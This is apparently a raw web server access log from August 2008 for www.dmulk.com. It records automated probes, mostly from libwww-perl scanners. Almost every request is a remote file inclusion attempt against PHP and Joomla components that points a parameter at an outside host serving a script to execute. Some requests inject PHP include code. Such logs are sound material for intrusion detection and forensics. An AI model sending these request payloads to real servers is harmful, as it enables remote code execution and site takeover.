218.38.54.160 - - [10/Aug/2008:09:00:38 -0700] "GET /logs/access_071224.log//ask_password.php?dir=http://www.visiskirtingivisilygus.lt/lt/images/stories/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [10/Aug/2008:09:00:39 -0700] "GET //ask_password.php?dir=http://www.visiskirtingivisilygus.lt/lt/images/stories/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [10/Aug/2008:09:00:39 -0700] "GET /logs//ask_password.php?dir=http://www.visiskirtingivisilygus.lt/lt/images/stories/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [10/Aug/2008:09:00:41 -0700] "GET /logs/access_080207.log//ask_password.php?dir=http://www.visiskirtingivisilygus.lt/lt/images/stories/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:00:55 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:00:55 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.98.144.78 - - [10/Aug/2008:09:01:06 -0700] "GET /logs//ask_password.php?dir=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.98.144.78 - - [10/Aug/2008:09:01:06 -0700] "GET //ask_password.php?dir=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.29 - - [10/Aug/2008:09:02:00 -0700] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.98.144.78 - - [10/Aug/2008:09:02:04 -0700] "GET //ask_password.php?dir=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:02:07 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
207.162.215.10 - - [10/Aug/2008:09:02:14 -0700] "GET //ask_password.php?dir=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.97.132.101 - - [10/Aug/2008:09:02:17 -0700] "GET /logs/access_080404.log%20//?pg=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:02:20 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:02:20 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:02:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:02:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:02:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:02:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:02:22 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:02:22 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:02:46 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://89.106.91.4/sex.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:02:47 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:02:47 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.76" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:02:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:02:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:02:48 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.54.160 - - [10/Aug/2008:09:02:55 -0700] "GET //ask_password.php?dir=http://www.visiskirtingivisilygus.lt/lt/images/stories/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:03:03 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:09:03:05 -0700] "GET /logs/access_080328.log/index.php?place=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:03:13 -0700] "GET /logs/access_080124.log///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:03:14 -0700] "GET ///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:03:15 -0700] "GET /logs///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:03:32 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:04:09 -0700] "GET /logs/access_080124.log///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:04:10 -0700] "GET ///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:04:11 -0700] "GET /logs///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:04:33 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.220 - - [10/Aug/2008:09:04:37 -0700] "GET /logs/index2.php?content=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [10/Aug/2008:09:04:38 -0700] "GET /index2.php?content=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.67.56.17 - - [10/Aug/2008:09:04:43 -0700] "GET /logs/access_080124.log///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.67.56.17 - - [10/Aug/2008:09:04:44 -0700] "GET ///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.67.56.17 - - [10/Aug/2008:09:04:44 -0700] "GET /logs///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.93.62.114 - - [10/Aug/2008:09:05:05 -0700] "GET /logs/access_080215.log/index2.php?inc=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [10/Aug/2008:09:05:05 -0700] "GET /index2.php?inc=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [10/Aug/2008:09:05:06 -0700] "GET /logs/index2.php?inc=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [10/Aug/2008:09:05:15 -0700] "GET //?pg=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.0" 200 18409 "-" "libwww-perl/5.53" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:05:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:05:29 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:05:30 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:05:35 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:39 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:39 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:39 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:43 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:05:44 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:05:49 -0700] "GET /logs/access_080404.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.25.230.39 - - [10/Aug/2008:09:05:56 -0700] "GET /logs/index.php?canal=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [10/Aug/2008:09:05:56 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.162.215.10 - - [10/Aug/2008:09:06:06 -0700] "GET /logs//ask_password.php?dir=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.162.215.10 - - [10/Aug/2008:09:06:06 -0700] "GET //ask_password.php?dir=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.186.5 - - [10/Aug/2008:09:06:12 -0700] "GET /logs/access_080308.log/index.php?net=bugtraq&act=show&bid=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.186.5 - - [10/Aug/2008:09:06:14 -0700] "GET /index.php?net=bugtraq&act=show&bid=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 200 18519 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.186.5 - - [10/Aug/2008:09:06:15 -0700] "GET /logs/index.php?net=bugtraq&act=show&bid=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.93.62.114 - - [10/Aug/2008:09:06:18 -0700] "GET /logs/access_080324.log/index2.php?inc=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:06:39 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:06:39 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:06:39 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.101.248.34 - - [10/Aug/2008:09:06:39 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.120.222 - - [10/Aug/2008:09:06:45 -0700] "GET /logs/access_071213.log//adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.202.120.222 - - [10/Aug/2008:09:06:45 -0700] "GET //adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.202.120.222 - - [10/Aug/2008:09:06:45 -0700] "GET /logs//adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:15 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.60.207.171 - - [10/Aug/2008:09:07:32 -0700] "GET /logs/access_080315.log/errors.php?error=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.60.207.171 - - [10/Aug/2008:09:07:39 -0700] "GET /logs/access_080207.log/errors.php?error=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:56 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:07:56 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:08:10 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.120.222 - - [10/Aug/2008:09:08:22 -0700] "GET /logs/access_071218.log//adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:08:40 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.202.120.222 - - [10/Aug/2008:09:09:00 -0700] "GET //adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:09:31 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:09:44 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.186.5 - - [10/Aug/2008:09:10:02 -0700] "GET /logs/access_080210.log/index.php?net=bugtraq&act=show&bid=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:09:10:29 -0700] "GET /logs/access_080329.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:09:10:29 -0700] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:09:10:29 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:09:10:29 -0700] "GET /logs/access_080320.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.120.222 - - [10/Aug/2008:09:10:44 -0700] "GET /logs//adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.202.120.222 - - [10/Aug/2008:09:10:44 -0700] "GET //adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:11:54 -0700] "GET /logs/access_080309.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:11:55 -0700] "GET //?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:11:57 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 200 60002 "-" "libwww-perl/5.64" "www.dmulk.com"
80.93.62.114 - - [10/Aug/2008:09:12:14 -0700] "GET /logs/index2.php?i=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [10/Aug/2008:09:12:14 -0700] "GET /index2.php?i=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:12:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:12:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:12:53 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:13:20 -0700] "GET /logs/index.php?redir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:13:22 -0700] "GET /index.php?redir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 200 18395 "-" "libwww-perl/5.803" "www.dmulk.com"
